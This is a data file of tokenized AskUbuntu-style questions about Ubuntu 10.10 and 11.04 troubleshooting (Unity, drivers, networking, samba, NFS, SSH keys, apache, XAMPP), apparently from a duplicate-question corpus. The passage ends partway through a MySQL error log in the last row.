34959	i upgraded and the old wallpapers gone , how can i get them back ?	i upgraded to natty and the old background images are gone . how do i get them back ?
34960	is there a way to tag folders with colors ?	i have a projects folder where some of the projects are mere legacy project . is there a way to give them colors , like you can in mac os x ? with dolphin , i used the various colored folder icons , but there is nothing like that installed on my system for nautilus .
34962	how do i make the microphone work on a toshiba portege laptop ?	i 'm quite embarrassed to ask this , as there 's quite a bit of info out there , but i do n't seem to be able to stitch it all together . basically , here is a new toshiba laptop running ubuntu lucid . everything works like a charm , apart from a microphone jack , which only produces very low level noise . sound output is ok , the problem is only with the input . the microphone jack itself is fine , since it works under windows . the pulseaudio server does n't seem to mute the mike . i 'm at loss as to where to even start looking into how to fix this , and will very much appreciate any suggestions . edit : installing the linux-backports-modules-alsa-lucid-generic ( as suggested here : http : //www.linlap.com/wiki/toshiba+portege+r700-r705 ) alleviated the problem . now the internal mike works just fine , the mike jack sort of works but the noise level on the jack is still very high .
34963	is there a way for non-experts to create new lenses/drawers for the unity launcher ?	so far i 'm liking the new unity interface , but there are certain aspects of the applications lens/dash that i find a bit inconvenient . for example , i have about 30 games installed on my desktop . with the old main menu , i could edit the games into categories , and it was very quick to view all card games , or all arcade games . with the current set-up , there 's no problem if i know which game ( or other program ) i want , but if i want to browse through the games , it 's less convenient . once i click on the applications lens , i have to pick games from the drop-down menu ( which requires more mouse movements than before ) , and after that , the games remain unsorted , so i ca n't browse by category . what i would like would be able to create a launcher buttons similar to the applications button , for specific groups of programs , so that i could , for example , click on an 'arcade ' button in the launcher , and see a list of arcade games . is there ( now or in the future ) any way for someone without programming skills to do something like this ? ( ideally , it would be of a similar level of difficulty to editing the gnome main menu . )
34964	thinkpad workaround for no `` super '' key	my thinkpad x43 has no super key . most of the keyboard shortcuts in 11.04 use this button : what are unity 's keyboard and mouse shortcuts ? what to do with unity now ? is there a way to map the fn button to super or something like this ?
34965	does installing with wubi affect performance ?	i just want to ask you , if i 'm installing the ubuntu beside the windows without any partition changes , using wubi does the ubuntu using more performance ( cpu , memory , hard drive ) , or same as a normal installation ? thanks .
34974	how to send print to windows xp ?	hello i am new to ubuntu i had it for a month or two . i am mad about figuring out a print server trying to send the print jobs that are coming to my print server to the windows xp machine by the network . can some one please help ? i am a novice ubuntu user .
34975	installing ubuntu with wubi or with standard installation	hi , i just want to ask you , if i 'm installing the ubuntu beside the windows without any partition changes , using wubi does the ubuntu using more performance ( cpu , memory , hard drive ) , or same as a normal installation ? thanks .
34978	configuring to detect if a command does not exist , suggest installation	can the zsh shell be configured to show what bash shows when a command does not exist , similarly to this : kahless : ~ $ sysv-rc-conf the program 'sysv-rc-conf ' is currently not installed . you can install it by typing : sudo apt-get install sysv-rc-conf rather than the zsh prompt : [ kahless /home/teward ] % sysv-rc-conf zsh : command not found : sysv-rc-conf note i do not want to change the prompt itself , but i want to change the result from zsh : command not found to a bash-like output of the program 'progname ' is currently not installed . you can install it by typing : or similar . is this possible with zsh ?
34979	how to change the shortcut to adjust brightness ?	i want to make my own shortcut to increase or decrease brightness . i do n't like the default shortcut of my hp laptop ( fn + f7 to decrease and fn + f8 to increase ) . is it possible ?
34980	what is the correct pronunciation of 'ubuntu ' ?	i have never been good at deciphering the pronunciation guides : ubuntu |oǒ'boǒntoō| what is the best way to describe the pronunciation with like sounding words for each syllable ? `` oǒ '' : ? `` boǒn '' : like boone as in daniel or like bun as in hamburger ? `` toō '' : like too as in also ?
34981	update manager missing	i went to update to 11.04 and my update manager is missing completely from the system file . is there any way to upgrade without re-installing the whole program ? ( i have a back-up on an external hard drive if push comes to shove . ) yes i tried sudo apt-get -- it almost worked . the pages fly by and i get a pop-up window that starts `` end-user license agreement for microsoft software `` i scroll down and come to a `` '' at the bottom of the page . it does not work . the page just sits there when i click on it . alt o just blinks the screen . enter does nothing . i went up to the menu bar and found reset under the terminal button . when i click on that i get a log page of an install/update the last part of the log says : '' dpkg : warning : files list file for package `ttf-mscorefonts-installer ' missing , assuming package has no files currently installed . ( reading database ... 169536 files and directories currently installed . ) preparing to replace ttf-mscorefonts-installer 3.2ubuntu2 ( using ... /ttf-mscorefonts-installer_3.2ubuntu2_all.deb ) ... i now have an update manager file under system- > admin- > update manager but when i run it i get this error message '' could not initialize the package information . an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'b-src ' is not known on line 2 in source list /etc/apt/sources.list.d/ubuntu-wine-ppa-maverick.list'
34983	troubleshooting wireless network connection : dns not working	i have a wireless router that assigns ips using dhcp . my laptop ( acer aspire 1 110l running ubuntu 10.10 ) connects to the wireless network , but dns is not working . i 've tried to trouble shoot the problem following various tutorials on ubuntu help , but i 'm stuck . ( my laptop works fine with other wireless networks , and other computers can connect to the internet using the router in question . my laptop worked fine with this router until a few weeks ago . unfortunately i do n't know what changed to cause the problem . i tried booting into various older kernels that are still on the system , but that did n't fix the problem . ) i can connect to the wireless network . the network manager applet indicates the connection is successful . ifconfig indicates that my computer is assigned an ip address ( 192.168.0.105 ) . /etc/resolv.conf contains one line : nameserver 192.168.0.1 netstat -nr indicates that i have a default route to 192.168.0.1 i can ping 192.168.0.1 , and my laptop ( i.e. , localhost , 127.0.0.1 , 192.168.0.105 ) . i ca n't ping other names ( e.g. , www.askubuntu.com ) or addresses ( e.g. , 64.34.119.12 ) . what should i do next to try to fix this problem ? thanks !
34984	which applications support the new scroll bars ?	will all programs in natty have the new cool scroll bars once the final version comes out ?
34988	how to mount a samba share permanently ?	how to mount a samba share permanently in ubuntu 10.10 ? also i dont want to display the share icon in my desktop . how to acheive this task ?
34989	how to remove open source noveau and replace it with the proprietary nvidia driver ?	i installed ubuntu 11.04 nattu beta on my machine with geforce 7025 card . but i 'm falling back to classic gnome instead of unity . i 'm sure the problem is noveau is n't enough to enable 3d acceleration . and we have to install nvidia proprietary drivers . before that we also have to remove noveau drivers . this is my knowledge base . no i want to know the detailed steps for the above can any one help ?
34993	why does n't ubuntu know the word 'ubuntu ' ?	it seems odd that i have to teach ubuntu the word 'ubuntu ' . why does n't it know itself . are there any plans to fix this ? it 's been like this for as long as i can remember . i 'm currently on 10.10 . question inspired by this .
34997	disk drive / not ready yet or not available	i 'll tell you the whole story . i decided to upgrade my natty from alpha to beta after a long time.after the updates has been downloaded , the system crashed during installation . i rebooted the system and during the plymouth screen i greeted with the error message '' disk drive / not ready yet or not available '' and options to wait , skip or manually recover if i choose to skip , it gives the same error , but with /tmp this time . and if i skip again , it just freezes . if i choose the option to manually recover , i get a maintenance shell . please help .
34999	booting ubuntu gives `` init not found ''	my friend has been using ubuntu 10.10 on vmware player for many days now . but today , it has a problem booting , so we started the ubuntu live cd to try and fix it . running sudo fsck /dev/sda1 ( got from no init start up error ) says that the device or resouce busy . so , i 'm guessing the partition was not unmounted correctly on the last shutdown for some reason . any help on how to fix the problem would be appreciated . if you need any further information , please provide the command to get it , as we have little knowledge of that . thanks .
35003	`` updating vmware tools for linux '' spins forever	i installed ubuntu 11.04 using vmware player 3.1.4 inside ubuntu 10.10 when first booting on the iso image i was asked if i wanted to download the vmware tools for linux and i accepted . it downloaded for a few minutes , and then it has been `` updating '' for an hour already . even shutting down the vm does not stop it . if i try to exit vmware , i am told : can not exit while still downloading . cancel all downloads and try again . '' but the dialog 's cancel button is greyed out . nothing special in vmware.log i ended up killing vmware player . a few days after i restarted it , it asked about the vmware tools again , i accepted again , and same problem .
35006	ubuntu 32 or 64 bit	i bought a new lenovo ideapad y560 with corei5 processor and windows7 64bit , but beside the windows i want to try the ubuntu too , but i need advice in this case , as i know this processors are supporting the 64bit architecture ( win7 64bit still running on this ) , so what would be better , the ubuntu 32bit or 64bit , on this laptop .
35010	how do i remove all programs connected to wine and wine with one command ?	i want to remove all programs associated to wine and wine itself in one command , can it be done ? the whole point of this question is that i do n't want to find any files connected to wine .
35011	why do firefox 4 and evolution always open maximized in unity ?	possible duplicates : prevent unity from auto-maximizing how to keep programs from launching maximized ? 11.04 why do firefox 4 and evolution always open maximized in unity ? even after you close the program windowed . is this a bug ?
35013	how can i play ace of spades ?	there is a new awesome game called `` ace of spades '' , that is similar to minecraft . however , it seems to be only available on windows . how can i play it under ubuntu ? please answer with a step by step guide if you manage to get it running . useful links for the hero to answer this question : game forums guide
35015	threats while using ubuntu ?	is there any precaution you need to take while using ubuntu ? because i dont use any antivirus available for ubuntu ! so any security changes do i need to make while surfing on the net ?
35024	how to add my favorite places as a quicklist in my home 's icon in unity ?	so i saw all that fancy quicklists in dash , and i 'm wondering if i can do it with nautilus to add places as a quicklist , like videos , pictures , downloads.. etc , so as a start , i tried to modify /usr/share/applications/nautilus-home.desktop and added this but it did n't work : x-ayatana-desktop-shortcuts=videos ; [ videos shortcut group ] name=videos exec=nautilus ~/videos targetenvironment=unity
35027	how to align my icons in my desktop ?	i want to align icons in my desktop , for this each time i do rightclick- > organise desktop by name . however this works well , by aligning the icons , but the thing is when i turned on my system again , its ( icons ) been in the previous position before it is aligned . how to solve this probelm ?
35028	recommended usb video capture device	i 'm going to do some reverse engineering on a device with a composite video output . it would be great if i could just plug this in to my ubuntu box and be able to record video as well as view the live stream in a window while i 'm working with the device in question . what usb video capture device ( with composite video input ) would you recommend that is supported out of the box on ubuntu ?
35031	ssh keys not working	i 'm using ssh-keygen to generate a key on ubuntu 10.10 , then using ssh-copy-id to copy the key to two remote machines that are running 10.04 ( one desktop , the other server ) . but here 's the thing : i can ssh into the desktop without a password , but then some time later i 'm asked for a password again . the server always asks for a password and never lets me login with my key . i 've checked permissions on the .ssh folder , the authorized_keys file , my id_dsa and my id_dsa.pub on all hosts , and they 're inline with what the ubuntu documentation suggests . i 've even copied my keys using scp and gasp set permissions to files and folders to 777 just to rule out any permission issues . does anyone have a foolproof way of setting up ssh keys on ubuntu for password-less ssh access before i change profession and become a flower arranger ?
35032	how do i get an nvidia geforce gts 450 working ?	i have just purchased a new asus engts450 directcu graphics card , geforce 450 . my problem is that i ca n't get to my desktop with this new card . at first i just simply replaced my old nvidia card with this new one , but booting freezes after the `` staring up logo '' . then i added ubuntu-x-swat ppa and upgraded nvidia driver to version 270.41.03 . i think it also upgraded x . but anyway , booting with the new card still freezes . i 'm running ubuntu 10.10 with all packages updated . does anybody know if this geforce 450 card will work with ubuntu 11.04 ? oh and i almost forgot , i tried booting 11.04 beta1 livecd with my new nvidia , and it actually started up into gnome . but it was n't using nvidia driver , so no eye candy or smooth desktop environment . any clues if this geforce 450 will work with nvidia driver on 11.04 ? thanks , opt
35033	how to decrease libreoffice icons size ?	i 'm using a netbook which runs ubuntu 11.04 natty narwhal beta . this new interface is really exciting and it 's creating very effective experiment on daily use . as you know , there are still some problems and bugs out there . in libreoffice , i could n't decrease the size of icons and this matter makes me a bit angry . please help on this topic , i 'll be waiting for answers . thanks a lot .
35037	facebook email account settings for evolution ?	i have a @ facebook.com email id ... how do i setup evolution using that ?
35051	is there an application monitor ?	i 've developed an ( awesome ) mozilla-based custom web-browser running on ubuntu 10.10 that needs to always be open ( it is basically a `` kiosk '' ) . if it crashes , which is easy to do in a single-threaded web-browser like mine , i need it to start right back up ( actually , a 10 or so second delay before restarting would be okay ) . application monitor for windows would be perfect if it was n't for windows . i have n't been able to find something , preferably with a gui , that does this . i usually develop for windows based systems so ubuntu is a bit foreign to me .
35053	how do i enable automatic updates of all packages ?	i 'd like to use unattended-upgrades to install all updates to natty beta packages daily . whatever i try , unattended-upgrades seems to ignore updates to packages in `` main '' . here 's my current allowed-origins section of /etc/apt/apt.conf.d/50unattended-upgrades . unattended-upgrade : :allowed-origins { `` $ { distro_id } stable '' ; `` $ { distro_id } $ { distro_codename } -main '' ; `` $ { distro_id } $ { distro_codename } -security '' ; `` $ { distro_id } $ { distro_codename } -updates '' ; `` $ { distro_id } $ { distro_codename } -universe '' ; `` $ { distro_id } $ { distro_codename } -multiverse '' ; `` $ { distro_id } $ { distro_codename } -restricted '' ; } ; update : here 's the working allowed-origins i came up with using the advice from the accepted answer : unattended-upgrade : :allowed-origins { `` $ { distro_id } stable '' ; `` $ { distro_id } $ { distro_codename } '' ; `` $ { distro_id } $ { distro_codename } -main '' ; `` $ { distro_id } $ { distro_codename } -security '' ; `` $ { distro_id } $ { distro_codename } -updates '' ; } ;
35056	permissions issue with symlinks over samba	i 'm having trouble accessing some files over a samba share . here 's my setup : i have shared /shared as shared i have a user with the same name and pwd as my linux user in my windows machine i made that user a member of the debian-transmission group there 's a symlink called /shared/downloads/torrents that points to /var/lib/transmission-daemon/downloads that folder is owned by debian-transmission : debian-transmission and its permissions are 4775 ( as created by the package ) i need to be able to read and move files from/to /shared/downloads/torrents from my windows box . right now , i 'm able to do that locally , but i get an access denied error when trying to read the downloads folder .
35058	will removed default apps come back after an upgrade to a new release ?	i long removed firefox , evolution , brasero and other apps that originally came with maverick . will the upgrade bring them back ? if so is there a way to prevent this ? also , will other 3rd party apps still work even if they 're based on maverick dependencies ? thanks for your help !
35060	how to setup a wireless access-point using my laptop 's wifi card ?	want to share my laptops ( running ubuntu 10.10 ) broadband with my android ( galaxy mini ) running 2.2.1 . since androids currently do not support ad-hoc networks so the `` create new wireless network.. '' wo n't help . q1 ) how do i setup a wireless access point using my laptops wifi card ? q2 ) what is the difference between an `` ad-hoc '' network and an `` access point '' ? **abdulkarim @ ak-laptop** : ~ $ lspci | grep ireless 03:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) iw list wiphy phy0 band 1 : capabilities : 0x11ce ht20/ht40 sm power save disabled rx ht40 sgi tx stbc rx stbc 1-stream max amsdu length : 7935 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 8 usec ( 0x06 ) ht tx/rx mcs rate indexes supported : 0-15 frequencies : * 2412 mhz [ 1 ] ( 20.0 dbm ) * 2417 mhz [ 2 ] ( 20.0 dbm ) * 2422 mhz [ 3 ] ( 20.0 dbm ) * 2427 mhz [ 4 ] ( 20.0 dbm ) * 2432 mhz [ 5 ] ( 20.0 dbm ) * 2437 mhz [ 6 ] ( 20.0 dbm ) * 2442 mhz [ 7 ] ( 20.0 dbm ) * 2447 mhz [ 8 ] ( 20.0 dbm ) * 2452 mhz [ 9 ] ( 20.0 dbm ) * 2457 mhz [ 10 ] ( 20.0 dbm ) * 2462 mhz [ 11 ] ( 20.0 dbm ) * 2467 mhz [ 12 ] ( 20.0 dbm ) ( passive scanning ) * 2472 mhz [ 13 ] ( 20.0 dbm ) ( passive scanning ) * 2484 mhz [ 14 ] ( disabled ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 4 supported interface modes : * ibss * managed * ** ap * ap/vlan** * monitor * mesh point supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * unknown command ( 55 ) * unknown command ( 57 ) * unknown command ( 59 ) * set_wiphy_netns * unknown command ( 65 ) * connect * disconnect
35064	changing colors in terminal output	when i write scripts i want that some lines are colored in output . my questions is not about changing prompt ( ps1 ) but for example how can i change that the output , let us say , `` cat /var/run/reboot-required.pkgs '' would be in red , for example . thx for answers
35071	ubuntu one webinterface to manage contacts	i have ubuntu one mobile package and i would like to change and store my contacts on the computer , because its easier than on the phone and backed up . i do n't want to use google sync , as they have enough data . the problem with the web interface is , that i ca n't add information to a contact . for example , i can change a number or an emailadress which already exists but i ca n't add a further email adress , the postal adress . pusing the button `` add phone number '' leads into no happening . i tried the newest opera , firefox and chromium . how to add information to a contact ? / why is the webinterface buggy ? i pay money .
35072	what should i do when the system says it can not find /	i was on my computer and running updates and something about firefox kicked me to a text screen from which i was forced to do a hardware reboot . on reboot , plymouth should low graphics mode and displayed a message saying that it can not find / and i could wait or open a terminal for manual recovery . waiting does nothing . fstab is in order . fsck has been run . the only clue of where i might go from here is given from when i ran this : $ sudo touch /forcefsck touch : can not touch '/forcefsck ' : read-only file system are there any suggestions ?
35076	how do i whitelist truecrypt to show in the indicator area ?	truecrypt installs and runs but is unable to use the unity system tray for the program running in the background . if one exits the main program can not be restarted to unmount the encrypted volume ( s ) . i have tried white-listing 'truecrypt ' but it still does not allow the background program to appear in the system tray .
35077	can not mount nfs4 share : no such file or directory	i am trying to get a basic nfs4 working between two machines ( let 's call them server and client ) . i have followed this manual by letter to no avail . here 's what i 'm getting : root @ server # : tail -n 2 /etc/exports /export client-ip/24 ( rw , nohide , insecure , no_subtree_check , async , no_root_squash ) /export/users client-ip/24 ( rw , nohide , insecure , no_subtree_check , async , no_root_squash ) root @ server # : showmount -- exports export list for server-ip : /export/users client-ip/24 /export client-ip/24 server side seems to be ok. directories exist , their permissions are granted ( 775 ) . addresses ( client-ip and server-ip ) are numeric - replaced with acronyms here for obvious reasons . next , the client : root @ client # : mount -v -t nfs4 server-ip : /export /opt/nfstest mount.nfs4 : timeout set for thu apr 14 15:52:31 2011 mount.nfs4 : text-based options : 'clientaddr=client-ip , addr=server-ip' mount.nsf4 : mount ( 2 ) : no such file or directory mount.nfs4 : mounting server-ip : /export failed , reason given by server : no such file or directory it just does n't accept the remote folder . apart from one above , i tried server-ip : /export/users , server-ip : / - getting same result . client does have access to server : root @ client # : telnet server-ip 2049 trying server-ip ... connected to server-ip . escape character is '^ ] ' . root @ client # : showmount -e server-ip export list for server-ip : /export/users client-ip/24 /export client-ip/24 local directory /opt/nfstest exists . module nfs is loaded on the nfs client . there are no firewall between the server and client . what else should i check ? additional information : ubuntu lucid ( 10.04.2 ) , running on amazon ec2 box . nfs versions ( nfs-common , nfs-kernel-server ) are 1:1.2.0-4ubuntu4.1 .
35079	i 'd like to prevent maximize from covering one third of the screen	using ubuntu 10.10 , gnome , and dual nvidia monitors . gnome panels and docky are able to `` reserve '' part of the screen for themselves in such a way as to prevent maximized windows from covering them up . i 'd like to setup a region on my desktop in the same manner . between conky , pidgin , pandora , and a couple of widgets , i have a group of items i want to always be able to view . `` always on top '' is not good enough , i do n't even know which part of the `` stack '' ( x , compix , metacity , gnome ... ) controls this behavior , and my google-fu was too weak to find the answer . thanks ! ( re-post from superuser.com , no answer over there in 2 days so i thought i 'd give it a shot here .
35081	command line interface to make a ogg mono from stereo	is there a command-line interface i can use to make one or more ogg-music-files into mono ?
35082	toggle synaptic touchpad with double tap on a corner	i 've got a new hp g42 and it features a led indicator on the touchpad 's top left corner and ( in windows , with the vendor 's driver ) it allowed me to tap twice in that corenr to toggle the touchpad and it would indicate me the status via that led . i know it 's quite specific setup , but anyone pictures a way of setting up the synaptic driver to get this touchpad to work as designed ?
35085	how can i use alltray in unity ?	i 've been using alltray with teamviewer to make to system tray . with 11.04 unity interface its not working . i know , unity have deprecated some of the tray features . how can i get teamviewer to move to tray and not to be placed in unity place holder all the time . ? .
35095	where should i put the broadcom bcm4313 driver for asus 1018 ?	i have a driver file wl.ko . how can i install it or where should i put it that my wifi works on my asus 1018 ? network controller : broadcom corporation bcm4313 802.11b/g lp-phy
35098	is it possible to change the 'check email ' shortcut in dash ?	in unity dash , the 'browse the web ' shortcut launches the browser selected by the user in 'preferred applications ' . but the 'check email ' shortcut always launches evolution , even if another email application is selected in 'preferred applications ' . is there a way to change this behavior ?
35102	battery not recognized on my laptop ( and it recognizes my laptop as a desktop )	i have installed ubuntu ( both 10.10 and 11.04 pre-release ) on my laptop but my battery is not recognized and it is detected as a desktop system rather than a laptop . i have tried to get the output of cat /proc/acpi/battery/bat1/state but the directory does n't exist . i have tried another guide to paste the battery info into this directory but it does n't allow me to do that and says that the directory does n't exist , even though i 'm trying to make it . i tried it in root nautilus and even on an install of lubuntu ( with a root file manager ) but it still failed to budge . i really do n't know what to do as i have tried all the guides on the internet that i could find . is there any way to change the configuration file ( s ) that detect the internal hardware of the computer . the /proc directory is a temporary ram directory afaik . is there a directory where that data is stored permanently and where the ram reads if you know what i mean ? thanks in advance . azorin this issue has been reported as bug # 764513 .
35106	backdrop equivalent	when i 'm reading ebooks , i find it quite useful to blank out everything except the reader . on the mac , i use backdrop to achieve this . what this app does is blank out everything ( wallpaper , desktop icons , etc ) apart from any on-screen windows . is there a program that does this for ubuntu ?
35109	how to change background color of gedit embedded terminal	how can i change the background color of gedit embedded terminal ? i have tried changing my normal terminal ( ctrl+alt+t ) background and restarting gedit - but no luck . thanks
35111	how to disable gnome-screensaver with a remote control ?	so i 've got a remote control and i want to make it so that when i press a button , my screensaver goes away but the problem is that when i set the keyboard shortcut and the screensaver is running , it shows the dialog where i need to enter my password ... it 's like it does n't recognize any commands while the screensaver is running ... also , i ca n't switch songs with my remote control while the screensaver is running but when i give it my password and unlock my computer then it understands my remote control ... is there a workaround to this ? thanks !
35112	lenovo y460 wo n't boot most of the time unless plugged in	my laptop wo n't boot natty beta 2 unless it is plugged in most of the time ( like 2 out of 3 times ) . after it is booted i am able to unplug it and let it run on battery power with no problems . sometimes i will be able to boot on just battery power , other times it will hang at either a blank , purple screen right after grub2 or at the flashing `` _ '' screen . my laptop is a lenovo y460 .
35116	jpeg files default to `` bless '' ( hex editor ) , not to `` eog '' ( image viewer )	i opened a jpeg file once with the hex editor bless . now nautilus and gnome in general have associated all jpeg files with bless . how do i get it to go back to eog ( image viewer ) ? i 've tried enabling the remember this application for [ ... ] files checkbox in the open with other application ... menu but with no luck .
35119	performance degradation after upgrade	today i have upgraded my netbook with ubuntu 10.10 to 11.04 . here are my specs : asus eee 1000hd celeron 900mhz ( single core ) 1 gb ram integrated gpu ( intel ) with 64mb shared memory sata disk always using gnome ( so in 10.10 ubuntu clasic ) it is not so amazing , but with 10.10 it was quite quick in comparassion with 11.04 . firstly , my login ( after password inserted in gdm ) increased from 15s to almost one minute . all of effects run very slow , slow is also rendering all windows ( also web content in my chrome ) . second ( and i think , this is bug ) , when i log out , i ca n't login once more . no selection with lang , keyboard and enviroment appears . is this normal ? if yes , for me it means downgrade back to 10.10 . thanks a lot ! tomas marcik ( czech republic )
35124	what does ubuntu software center error `` bad quality package `` means ?	in 11.04 , ubuntu software center complains most of the .deb package as bad quality package including chrome from google . what does it means ? how can i force software center to accept the package and move on with installation ? .
35125	is compiz now embedded in unity 3d ?	does installing 11.04 mean that i do n't have to install compiz and ccsm provided my graphic card supports unity 3d ?
35128	is compiz embedded in unity 3d by default in 11.04 ?	does installing 11.04 mean that i do n't have to install compiz and ccsm provided my graphic card supports unity 3d ?
35138	editing apache vhosts and ubuntu hosts file ?	i have just installed ubuntu ( 11.04 ) . i have installed apache/mysql/php etc . i have a few sites sitting in /var/www/site1 /var/www/site2 /var/www/site3 i want to be able to access these at http : //site1.local http : //site2.local http : //site3.local so in my hosts file i have 127.0.0.1 site1.local 127.0.0.1 site2.local 127.0.0.1 site3.local then i have copied /etc/apache2/sites-available/default 3 times . so now i have : /etc/apache2/sites-available/site1 /etc/apache2/sites-available/site2 /etc/apache2/sites-available/site3 these all look like ( with appropriate sitex names ) < virtualhost site1.local > serveradmin webmaster @ localhost documentroot /var/www/site1 < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/site1/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > in the terminal i then call sudo a2ensite site1 site2 site3 & & sudo /etc/init.d/apache2 reload which seems to work , except only one of the vhosts works at the same time ( including default ) , what am i doing wrong ? when i run the reload command i get reloading web server config apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername [ fri apr 15 10:45:27 2011 ] [ warn ] namevirtualhost *:80 has no virtualhosts
35140	which version of unity am i running ?	i just installed ubuntu natty beta 2 on my system . and i also keep regular track of the milestones of unity in launchpad . when i downloaded ubuntu natty beta the unity version was 3.8.6 . however few hours ago they released the 3.8.8 version . i need to know the version since it will help me test the features which were added and other stuff . how can i find out which version of unity i am running on ubuntu natty beta 2 ?
35141	radio tray icon applet does not load in unity	the radio tray icon will not show in ubuntu 11.04 ( natty narwhal ) beta 2 under unity , but it works in classic mode . i have it set as a startup application using the command /usr/bin/radiotray . it loads perfectly in classic mode , but not at all in unity . how can i get radio tray to work when i use unity ?
35144	is there a battery indicator ?	generally when using my laptop , in maverick the battery icon used to show up in the panel giving me an indication of the battery status and also allowing me to set the performance of the machine like performance , normal , on demand , power save etc . however i have ubuntu natty installed on my dell inspiron 1525 and it did not show any battery info on the panel . this can be seen from the screenshot below.. is there a default battery indicator for natty ?
35145	how to change the shortcut to scroll ?	i want to change the shortcut to scroll . instead of using the edge of my ( buggy ) touchpad ( see this ) , i would like to make my own shortcut with the keyboard keys . is it possible ? thanks in advance .
35155	how to uninstall latex ?	ubuntu and latex newbie here . very basic question i have . i recently installed latex using the following code : sudo apt-get install texlive however , i want to uninstall this and just get the latex base for now . i tried the following but it does n't work : sudo apt-get remove texlive dpkg -- get-selections | grep tex shows that a number of latex related files are installed . how do i remove texlive ?
35156	move main menu from top panel to top of the window ?	is there a way to move program 's main menu ( the one that says file , settings , help , ... . ) from the top panel unity 's panel to the top of the window , like it was before ? i have 25 '' display and if small window open on the right side of the screen it is kind of annoying to move cursor to another corner of the screen to press go to the menu . or if i need to go to the menu of not active window i must always click on and only then will be able to access menu .
35158	xampp wo n't start mysql ?	when i go to my xampp control panel and press `` execute '' for mysql it refuses to run . it is a completely accurate and clean/fresh install . i 'm running 10.10 . here is the error log : 110414 18:43:52 [ note ] plugin 'federated ' is disabled . innodb : the first specified data file ./ibdata1 did not exist : innodb : a new database to be created ! 110414 18:43:52 innodb : setting file ./ibdata1 size to 10 mb innodb : database physically writes the file full : wait ... 110414 18:43:52 innodb : log file ./ib_logfile0 did not exist : new to be created innodb : setting log file ./ib_logfile0 size to 5 mb innodb : database physically writes the file full : wait ... 110414 18:43:52 innodb : log file ./ib_logfile1 did not exist : new to be created innodb : setting log file ./ib_logfile1 size to 5 mb innodb : database physically writes the file full : wait ... innodb : doublewrite buffer not found : creating new innodb : doublewrite buffer created innodb : creating foreign key constraint system tables innodb : foreign key constraint system tables created 110414 18:43:53 innodb : started ; log sequence number 0 0 110414 18:43:53 innodb : starting shutdown ... 110414 18:43:58 innodb : shutdown completed ; log sequence number 0 44233 110414 18:43:58 [ note ] plugin 'federated ' is disabled . 110414 18:43:58 innodb : started ; log sequence number 0 44233 110414 18:43:58 innodb : starting shutdown ... 110414 18:44:03 innodb : shutdown completed ; log sequence number 0 44233 110414 18:44:03 [ note ] plugin 'federated ' is disabled . 110414 18:44:04 innodb : started ; log sequence number 0 44233 error : 1064 you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'alter table user add column show_view_priv enum ( 'n ' , 'y ' ) character set utf8 not ' at line 1 110414 18:44:04 [ error ] aborting 110414 18:44:04 innodb : starting shutdown ... 110414 18:44:09 innodb : shutdown completed ; log sequence number 0 44233 110414 18:44:09 [ note ] /usr/sbin/mysqld : shutdown complete 110414 18:44:09 [ note ] plugin 'federated ' is disabled . 110414 18:44:09 innodb : started ; log sequence number 0 44233 110414 18:44:09 innodb : starting shutdown ... 110414 18:44:14 innodb : shutdown completed ; log sequence number 0 44233 110414 18:44:14 [ note ] plugin 'federated ' is disabled . 110414 18:44:15 innodb : started ; log sequence number 0 44233 error : 1050 table 'plugin ' already exists 110414 18:44:15 [ error ] aborting 110414 18:44:15 innodb : starting shutdown ... 110414 18:44:20 innodb : shutdown completed ; log sequence number 0 44233 110414 18:44:20 [ note ] /usr/sbin/mysqld : shutdown complete 110414 18:44:21 [ note ] plugin 'federated ' is disabled . 110414 18:44:21 innodb : started ; log sequence number 0 44233 110414 18:44:21 [ note ] event scheduler : loaded 0 events 110414 18:44:21 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.1.49-1ubuntu8.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) 110414 18:56:29 [ note ] /usr/sbin/mysqld : normal shutdown 110414 18:56:29 [ note ] event scheduler : purging the queue . 0 events 110414 18:56:32 innodb : starting shutdown ... 110414 18:56:47 innodb : shutdown completed ; log sequence number 0 44233 110414 18:56:47 [ note ] /usr/sbin/mysqld : shutdown complete 110414 18:57:39 [ note ] plugin 'federated ' is disabled . 110414 18:57:42 innodb : started ; log sequence number 0 44233 110414 18:57:42 [ note ] event scheduler : loaded 0 events 110414 18:57:42 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.1.49-1ubuntu8.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) 110414 19:21:14 [ note ] /usr/sbin/mysqld : normal shutdown 110414 19:21:15 [ note ] event scheduler : purging the queue . 0 events 110414 19:21:17 innodb : starting shutdown ... 110414 19:21:18 innodb : shutdown completed ; log sequence number 0 44233 110414 19:21:18 [ note ] /usr/sbin/mysqld : shutdown complete 110414 19:23:40 [ note ] plugin 'federated ' is disabled . 110414 19:23:40 innodb : started ; log sequence number 0 44233 110414 19:23:41 [ note ] event scheduler : loaded 0 events 110414 19:23:41 [ note ] /usr/sbin/mysqld : ready for connections . version : '5.1.49-1ubuntu8.1 ' socket : 